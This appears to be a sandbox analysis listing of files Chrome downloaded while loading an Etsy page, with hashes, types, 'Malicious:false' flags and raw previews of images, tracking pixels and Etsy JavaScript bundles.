                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):349938
                                                                                                                                                                              Entropy (8bit):5.417814336766811
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:3FD63F5C2521FD1512578E1DCDE56A1D
                                                                                                                                                                              SHA1:0EB558F3D395899D6FB34D05F956B94289C6EA7E
                                                                                                                                                                              SHA-256:8257D5A78BC54902D7AF44125A9ADB813B495D3A5DEA731A8A565F55DC2D6BD1
                                                                                                                                                                              SHA-512:9148654C8D4B743D523C20334DDC979697D3E3E0BF94E2CB670E097A08A16F19B5C45A2D9D7739F112C1E1922551ED929E5B44BEEF3320FCEECABF2A8223B3AA
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://analytics.tiktok.com/i18n/pixel/static/main.MWMyZjYwMzkyMQ.js
                                                                                                                                                                              Preview:!function(){"use strict";function t(){t=function(){return e};var e={},r=Object.prototype,n=r.hasOwnProperty,o="function"==typeof Symbol?Symbol:{},i=o.iterator||"@@iterator",a=o.asyncIterator||"@@asyncIterator",c=o.toStringTag||"@@toStringTag";function u(t,e,r){return Object.defineProperty(t,e,{value:r,enumerable:!0,configurable:!0,writable:!0}),t[e]}try{u({},"")}catch(t){u=function(t,e,r){return t[e]=r}}function l(t,e,r,n){var o=e&&e.prototype instanceof p?e:p,i=Object.create(o.prototype),a=new I(n||[]);return i._invoke=function(t,e,r){var n="suspendedStart";return function(o,i){if("executing"===n)throw new Error("Generator is already running");if("completed"===n){if("throw"===o)throw i;return T()}for(r.method=o,r.arg=i;;){var a=r.delegate;if(a){var c=g(a,r);if(c){if(c===s)continue;return c}}if("next"===r.method)r.sent=r._sent=r.arg;else if("throw"===r.method){if("suspendedStart"===n)throw n="completed",r.arg;r.dispatchException(r.arg)}else"return"===r.method&&r.abrupt("return",r.arg);
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (716), with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):716
                                                                                                                                                                              Entropy (8bit):5.614957189867915
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:4A8C8D308C5CC0E07A5E4B4464009522
                                                                                                                                                                              SHA1:0BC924E23151CE69F2E1A403546AF6D021843905
                                                                                                                                                                              SHA-256:1B9B156A10B290F450B3FFDE2E57D4A1BE4BC9EBBBC8FCFFCB31952EB5D66EF0
                                                                                                                                                                              SHA-512:9E8D2B8DA2817EEC4C7EE701C66180E19CD087BC8EAFD17790EEC8601A9344DCBC9965AA23EDDB459568A5BCD78B04A06327023EA3B7D816E0FFF72ED33297EC
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://9910951.fls.doubleclick.net/activityi;dc_pre=CM_A6p-dn4kDFXLuuwgd1i4HuA;src=9910951;type=remarkt;cat=unive0;ord=9610706358423;npa=0;auiddc=2084024919.1729505276;u2=%2F;u3=undefined;ps=1;pcor=1283930748;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4ah0v9190758491z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101686685~101794736;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2F?
                                                                                                                                                                              Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="https://adservice.google.com/ddm/fls/z/dc_pre=CM_A6p-dn4kDFXLuuwgd1i4HuA;src=9910951;type=remarkt;cat=unive0;ord=9610706358423;npa=0;auiddc=*;u2=%2F;u3=undefined;ps=1;pcor=1283930748;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4ah0v9190758491z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101686685~101794736;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2F"/></body></html>
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):90289
                                                                                                                                                                              Entropy (8bit):7.997695510337053
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:7C22B145A4079ECAAE8478EDDD014749
                                                                                                                                                                              SHA1:8A818C52E3FD3A77E87751C6004B5B2FDAA71166
                                                                                                                                                                              SHA-256:939CC336EED3C93AF35745A52F030A155D954E4669A7AD1D7795AADECBF49848
                                                                                                                                                                              SHA-512:9821B4B32D09FF8F79E3806888729DBA28F5CC099615CE33BAF7F226F96D0BC177F4FD6BFD24DB300B6598089BB3EC361708E939A762B704D1BF15C938AE0C4D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/iap/2a94a4/5551513611/iap_600x600.5551513611_c9pso4ah.jpg?version=0
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@.................._....#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma................._.mdat.....&ey_.....2....p.E.Q@.......+=.(....B........{..to.9...#.uz.%.....C.J......ZO.R....o.g......5.[.sB...B...mw!*~......Yj...{...9M..d..J{%...........DLP.\. %?v*M.}zj.j......}.b......56..IC.q.0..f&RQ.DO... .T.D.X...[..'vr..H..e....[/...]..@.h..|.Q.x..F.c,.... 1.Y.f.U._.!.......:../d..[/..f..5R...z.......@.7...=!a.j...{%...f.P.QE9.6..=z.p..wIs...Z).....>.p..o].E9nv...{<<.g.t4.N..[.&.@.i..+.........9.V....O(.USWk=3...f..7/..:.{......7.>.[#..W.....L..p.s.....1........u....mmA0;..40.e...!2..,l...`.vN.Tq.s..b.B...|H....9;1..U.ZR...s3.M'1..........@.I.W..e..,v.U........%bv...zU.R../u..H....r;.`...>*..r...7Y.6)3.~...\..e..U.S...,..z.E...r>......>"-! Q..!....BUK.J.Q ..]. .....CJ*0#...&.?...fw.Hj...}Q.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):19190
                                                                                                                                                                              Entropy (8bit):7.913529310604663
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:9218119A509EDCDBB8E765073910D02C
                                                                                                                                                                              SHA1:F21F99ACF65D8D52490419E4E750D95D85A8B979
                                                                                                                                                                              SHA-256:9EE633932E2277D0BAE9A60E4D07B2F4D1E54100D025F00207DE8CB6714BD265
                                                                                                                                                                              SHA-512:EC70B12932719A5AE1393590571478E9F8C7A8E706621E36C8B987530215BF8E2E4D18776DEE369C5EC786E9EC789CC55229E27EA88CA0CC9F9D319A78B12A8F
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......,.,..".........................................?.......................!..1.A."Qaq...2..#B..Rb....r..$%C...3.................................3.......................!1.AQ.aq.".2B.....#3...Sb.............?..rH .;b...g fh..N.o...&d...@.9...<}.A<Gj9...(.\.T.8.=..&I....2..v...$...N...A..8..<.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (3835)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):228474
                                                                                                                                                                              Entropy (8bit):5.5445742864737735
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:C70E9EBD8B0AA34FE48796FA89120108
                                                                                                                                                                              SHA1:9C46E3EB79F2D9274136D79234ABEB5B3AA453CE
                                                                                                                                                                              SHA-256:5726C5781B2860600633DD3598FA021A4D460568A0090A638A752AFF001DA188
                                                                                                                                                                              SHA-512:2BFAAF77C15FAB63BB1116E24310225C39DF5B3FC6D148ADA577AD6122C69623AD235FB3386F58FEFC891C43828F65B1F4F86DD4C4FEF923F373FB0AFEF0D28E
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__rep","vtp_containerId":"DC-9910951","vtp_remoteConfig":["map"],"tag_id":1},{"function":"__ogt_1p_data_v2","priority":0,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regionValue":"",
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):20308
                                                                                                                                                                              Entropy (8bit):7.968404480979858
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:AAC31E6990EC5D60DD2283C632C98655
                                                                                                                                                                              SHA1:4FD6A978195FA66C0764FFAAA795D5A2215E8617
                                                                                                                                                                              SHA-256:8190550DB8F48B34AA3FFE3332C3A484A4EEBA52C747678FFB3FBBA4540E9DC9
                                                                                                                                                                              SHA-512:95D0F5F6CBB84565FD739F1227F503661F65B6A413EB2B8AC923D15BA40C9CE50788F4464A524355FBF57AC8DE1FEA278800B02000E0F554A07663035183AE0A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/19469360/r/il/4887d1/6290340796/il_340x270.6290340796_72xu.jpg
                                                                                                                                                                              Preview:RIFFLO..WEBPVP8X.... ...S.....ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..VP8 .M..0....*T...>E..D"...Y..(.D.L..t..7..?.~.......k...>............C...?`/.........l.i=.?.~.{..5...........a_./N....._..s..?............e.C..D.f.7.z..O.OX..x/.KP.........a('._....F.........}..'......d?.........._..............3..;...H..D...(....-.....x].@.Dd A..Ej...}?.....v...D...8.....Vq....K.g....;..p.YeB..A{.d......y..4.R..p~...g..).%(."..)...u-E......z+....yGkZh.....?.P...),..!.$!.....%dK7...^...7a..Uq..|...
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 600x600, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):14206
                                                                                                                                                                              Entropy (8bit):7.98700213811172
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:1276033F9E837EB5755F726BDD69D6AB
                                                                                                                                                                              SHA1:FB75A431B412DB925671324EFA2CD2156A9FBF30
                                                                                                                                                                              SHA-256:D085E30BA9ED62D86FE12CCFB6B6EE182762204D4AE668D6B1269BD21F63E4B4
                                                                                                                                                                              SHA-512:096967721927CCB8F9AA53F3CA6654062CA2413CE3DB1A9B704AB3ECE0B2554DC36BF6ED8A167A042615ECDD6CBCED04A6099130742976E5F81E3E19EBF626B0
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/6608696/c/533/533/75/0/il/ed6617/5497849415/il_600x600.5497849415_6a42.jpg
                                                                                                                                                                              Preview:RIFFv7..WEBPVP8 j7......*X.X.>m4.H$#+..6..p..eK.v..tn3.!.......S?...~..,.m.h.~....~..O....l.7..}l.....q...E...O.g./I^..Gn.<.O>.".....G.?.../..Lp)...~{^.t..U.5c.%..}.^......n..]oG.)%.7up..7.?..7..3.j....4Q*.(p..W..@.d.Y/..C0e....>.:-...R.P\...|.[...3....[d.....R.5>......b....>l'.....%.... ..}...x.\,...)K.I..2...H-=n..EC,...%.....;.e..{.\_......`*(...cR...d.Cmc........<!TAW;....q~..,...."..tV.i..]E.I...=.......%".9..<$..W.r..<-.:.i...8...?..a.....N....._........(f......_)..4[*.PS.w..v.@..E.r!.+...,...X..U...{.ef..s...'i.G#....u.......e. .K......|.h..@...q.N....vH.a..Sd...8.vFV.G....yu.....5.*.sL..n.....`..r=.|.,"....=.c..k...6.Z..RQ.._...7..%...m?.F.......k...(.Gg.g......M..hY....Pg..F.'...g........=....{.Qu.....p.B..N.c=5zY...r.WX...4x.oXv.<...edgA...z..YH.... ...C+;H... ..4..$.[.85..\~.9:....=..!j.....-....T'*z....utY...".O.(Y.9.D.....!..o..'.=.x..v....].ki..P.V.@.......u.x.xs...C.W...Y$..A..|miWp..e..}J\7...!..pR.../.....~.@.....}BW..3(...hl.+......
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):55950
                                                                                                                                                                              Entropy (8bit):7.996422159939329
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:C4F59BB4DB13F3D8DF530D0E13A7FB48
                                                                                                                                                                              SHA1:D10AA1D63023362B6F58E6AD1A8F38AA49E12502
                                                                                                                                                                              SHA-256:301D993271594F817A4ED8E646763322A7E70BBD5BAB13EA01FC5D2D061117B3
                                                                                                                                                                              SHA-512:B554F47214E3BCB46D8CA4E41A52BEC1E63D702286C2A7A103007B7A7798CD54F0C08CE6D7037085B08A24BC63007E4CF5039D583393CCB0F5539C3CB6C8C584
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/30543447/r/il/2820f3/3717750106/il_600x600.3717750106_n6gh.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@......................#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma..................mdat.....&ey_.....2...P...A@..\......`....c.$o.8.T..p..Z......t.K-..N...u#.e[....5|..7t]..........P.I.%Z..>uq..............@OO.D.Q...C..=....(..".&a_...]8&.5............pIz&...F..Z....J.....G:.]..U..............=...>6a.(?.}~.S...[C*.bc..>...j.`i{^R...).Z.?..}B...xO...F.`.`h<.q......0<d~yFeK^...'..x.](.2..fu"....s...e.. .................w.E..:..d.>.>..|......e....%.i.....".NW......VR....r....Er....Z.p..=...D.....q..1....I|.]..\.t`x...|w.h.0.J......(....Q9x.JS..+7....C...'..9\.:.clPo.!.s....w.D.....B.?...bl....Y.`.X.....t..<`(.)gj..-.........~.j..g..%..H...*...C...%)..i!j...a.s...}N&....-K.X..l|.f."N.... }_..P.....(jh....B.....W..;...y.d... z.2IS.y..g........dp.."..jw.dR...w.}.....IP__....8..>
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 170x135, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):10316
                                                                                                                                                                              Entropy (8bit):7.867376975957736
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:4DC69B1308E0787DF44E08CE8B0C1640
                                                                                                                                                                              SHA1:3B8AFB6B3B478ED6C8F1FF031C02BFF7E16AB5A7
                                                                                                                                                                              SHA-256:D98FA0663A71053A00F352C8928BC014B90013059ABAA4582CD144705C5A8440
                                                                                                                                                                              SHA-512:986778B036C53A9A5264F84440F0606A8A4ED5D3E1331A69BDF63EE7E87BEED61D8274B8ED0A793F9BD67DB69E75F890D8EE16FD55D405AA9345AF6544BB766D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd..........."........................................C.........................!.1."AQ..aq2...#BR...3...Sb....$%4Cr...................................2........................!1QAa..."2q...B..#.3Cb..............?.x..t.]Kn.{.N..8..IP.Q.P._..r..}5r.../U..AJ.&..L..HVe..H..8.M(.%.|T...d......d+.,.#Pu.T
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:MS Windows icon resource - 3 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):15406
                                                                                                                                                                              Entropy (8bit):2.577115683166017
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:BA54A391EA74ED58AC2A3F8A54D5071E
                                                                                                                                                                              SHA1:F1F26A3B427DB9CA7175AC9C8AC131EA576213AF
                                                                                                                                                                              SHA-256:89BED06B5D86D8988418B3230289342B3851D973EDEF9624A098A5A66B1B711C
                                                                                                                                                                              SHA-512:7B1E3FA0214A9EAF49A802D3C4ED2284E449CCE4290D2C007E5340332023725F6013D6DCC6F7D60B3B40F8DB895AC7F9180BF405F2BE1E9612E0DAD19891AF78
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:............ .h...6... .... .(.......00.... .h&......(....... ..... .................................................................................................l:0.c.$.c.$.................Z...O...............................Q...Q...................z...)...)...3...........................Q...........................)...)...)...2.......................................h...p.......h...)...)...)...2...............................Q....a...a..6.......h...)...)...)...............................F....a...a...a..5.......r...,...e........................K.........n...a...a...a..4.............................................}......n...a...a...a..0~............................................|......p...a...a...a..0~...........................................y......p...a...a...a../~...........................................y......q...a...a...a.....................................................q...a...j..................................................................................
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):69427
                                                                                                                                                                              Entropy (8bit):7.996434809614923
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:6828E0909F4C06817C79CEE7B02979E5
                                                                                                                                                                              SHA1:2EBBE93850B4172C53629D7F5294A7922EC4419F
                                                                                                                                                                              SHA-256:E3D026DC0C002CC3BDCC4D8C44F839275D8FA8FEF1E8936ADB951384471F8A94
                                                                                                                                                                              SHA-512:FEFCE3F054E517796F7ED4833C330B93DDAF42F25DB53AC13A2C00D3365A61BFE64AA8F530B5AE052D1E9FCFE0D6A51C6A0F70EFA35F330E5A498D632CD0C81C
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/10258104/c/1960/1960/578/494/il/85a608/2240926858/il_600x600.2240926858_2mte.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@...................%...#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma..................-mdat.....&ey_.....2.... ...A@.A.r....../z.=.....k^...c-....#.I...@...9.84.......P0V..RH#..,........<....$.E%l..'.....N...|L.k.U(..F.x...k...b...+S.Z..6...H..Z..d....^....e..M..x&...^`T:..x....r.<V.......hXG..7yN....._.L.`6g..,.D.'.hH...7....Z....N.n>.B..$N.U.._.,...H..a.u".......I.X..U..[>..1....5.3.i6.8Y......j..}c^[. .a0.....l..[S5.*..[g...J.v.D..Q..).Kz3X]...MpQ.;...1.{F.',...b_...a......a.n.u..&Qq|/.JPp....7-..3v..1:.}.S..\.jm.$..O........8..T...x........#....]`...~...<..N`F.K.l.@.pV.A.U....m........}<...vd....$[..Z...m....sgIZ.`...v6.W..tt.F...[.GB. ......}l...x.........mRq#.0Zb..k..<.....@..6 ...I.7.,r2"./7zm..W.!.y.4q.w..et.M..L.D..m.z.....o.J..~.[C....X......N.....=...&Z...{.e..k..x.M
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 794x1059, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):144500
                                                                                                                                                                              Entropy (8bit):7.972381785653193
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:024C0C65336C11366B7254DC4ED8F07C
                                                                                                                                                                              SHA1:5643012C767ADE66C55B72B39C16295EA74E3692
                                                                                                                                                                              SHA-256:CB7670389973DB9F7A9FA7D51BFEB4D22FA4772029C16566C40105360A390741
                                                                                                                                                                              SHA-512:A87CE4E7291E0C7AD63C080F1DCD4A8D4E42F82F5A1278B0E22E3AA63FD7A0930D1B6EB1077AD1CE3205EB7E70DA38D2EDEB1EF4DECE1B5215FF3FCE061FD5E2
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......#....".........................................Q........................!.1AQ.."aq...2..#B...R..3br..$C...Sc.%4s...D.'5T..de...................................7......................!1A..Qaq.."2....BR...#.Cbr3................?......p.....j.=2z.....Vm,..tD..i2.8..h|^&.)...#......'K....6..H.]+
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (16205)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):16342
                                                                                                                                                                              Entropy (8bit):5.391488373049737
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:322465A2AB0D4C09BB92055864599C51
                                                                                                                                                                              SHA1:C01DC57460E0DECC78D4A42547BA92D7357FB119
                                                                                                                                                                              SHA-256:FF57A08917E7A4B3B04D039E9FB1BA02CD0439EA3165BA8C896F137397217178
                                                                                                                                                                              SHA-512:0A20A132C1C2323CA0A60C2F171B5781FA4903E65B81310EC55D9D471C06189825BE6B388AFBA3B7C7D445D998593AAE5CA53737476A8A276AB3EE062BD913D4
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://www.etsy.com/ac/evergreenVendor/js/en-US/react-ssr/component-islands/queue.a495afae5d5c6530c7e8.js
                                                                                                                                                                              Preview:(()=>{var e={87215:(e,t)=>{var o,n;!(o=[],n=function(){}.apply(t,o),void 0!==n&&(e.exports=n))},26917:(e,t,o)=>{"use strict";o.d(t,{onDOMReady:()=>r,onWindowLoaded:()=>u,onWindowUnloaded:()=>c});function n(){return!!window}function a(){return!!document}function s(){return n()&&"function"===typeof window.addEventListener}function i(){return a()&&"function"===typeof document.addEventListener}function r(e){if(!a())return;(document.attachEvent?"complete"===document.readyState:"loading"!==document.readyState)?e():i()&&document.addEventListener("DOMContentLoaded",e)}function d(){return new Promise(r)}function u(e){a()&&"complete"===document.readyState?setTimeout(e,0):s()&&window.addEventListener("load",e)}function c(e){if(!s())return;const t="onpagehide"in window?"pagehide":"unload";window.addEventListener(t,e)}},96072:(e,t,o)=>{e.exports=o(86166)(2616)},86166:e=>{"use strict";e.exports=vendor_bundle_051a2557fd322e046abd}};var t={};function o(n){var a=t[n];if(void 0!==a)return a.exports;var
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):7033
                                                                                                                                                                              Entropy (8bit):7.942096257052542
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:8796143E2A0C922BDBA022209C797EBA
                                                                                                                                                                              SHA1:1CDAE8AF45B37A48953A4ED56A16658555707F5F
                                                                                                                                                                              SHA-256:091B787266710F203CDA7151C6FD87B091B2CCA3F87E7919DD30F6E7DEF5AF4A
                                                                                                                                                                              SHA-512:39F1B83AC1DE2A27E0F071F21EF2A4E34494D886A141826C2F19E5434C3F45F7BBAA7D7D464C52CF85749598F7E5AC005647AF5C6EA5A20CEF759C34609B1807
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/ij/1e3b64/5598593258/ij_300x300.5598593258_gg93cjvh.jpg?version=0
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@...................k...#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......,...,....pixi............ipma..................smdat....."%r....4 2.4. ...A@....JVq2..../$.{e.A.a.z.2.+.sf.'.JS..Z{.U3.M.r..g.H.NG.Q....?..yd..R..q.+4.P...q0..b..)s.E\.K..A^m..,..)8....g......v...G.........%..1.)..^.R.W.m.O....a..8.$#=.:`..Q?..M.........7...(wy..J..?@`lO.6x.t....h/&B.......mhv...@...S.3...,.....^..r..t?Z.!...k..V..2..g9...CY......WT....\.....yR,.u.>..<...S}......o*..6.*...........K.5*k....R......3H.]{..U.{T..-9...F..o.d.G..n}..<A..A..L.|...uy...>k.....;.%.$..n..|X.:..y[.U.F.4 $..f.%.......=..5.@.?5..H,.....a..t.....[....0........kr.*2..1^.<.....O..7...#.>...D.Xr<...E3V}1|..%...0Rfz$.l..]..Z~.8K.w..n.J......J..y.B_.[...d..O....!gq..w...l.@C%..0]w.>....\....."..!.v"...[ra..qRk.....~+..?..1....&....`i..\]l.,..N.O'...\.I.l
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):18678
                                                                                                                                                                              Entropy (8bit):7.983131967993391
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:5C1E5CF4CF201CDE61522473524E6AE3
                                                                                                                                                                              SHA1:721F57A67EEABD2291768A946E9DC237201E704E
                                                                                                                                                                              SHA-256:1F3374D71F381B86993DD5EB0B8583B8A73335DAF245AA1B54AA493BBFA8037B
                                                                                                                                                                              SHA-512:22D059EC46BC52A2379BB2836510609526889A3935425523D56AF21C7D639B87CA9396726DEB75508CB2541869BE44E2A595A8040FB82522CAEEF25CCBCB73E3
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/18152467/r/il/d94412/5976316063/il_340x270.5976316063_qapy.jpg
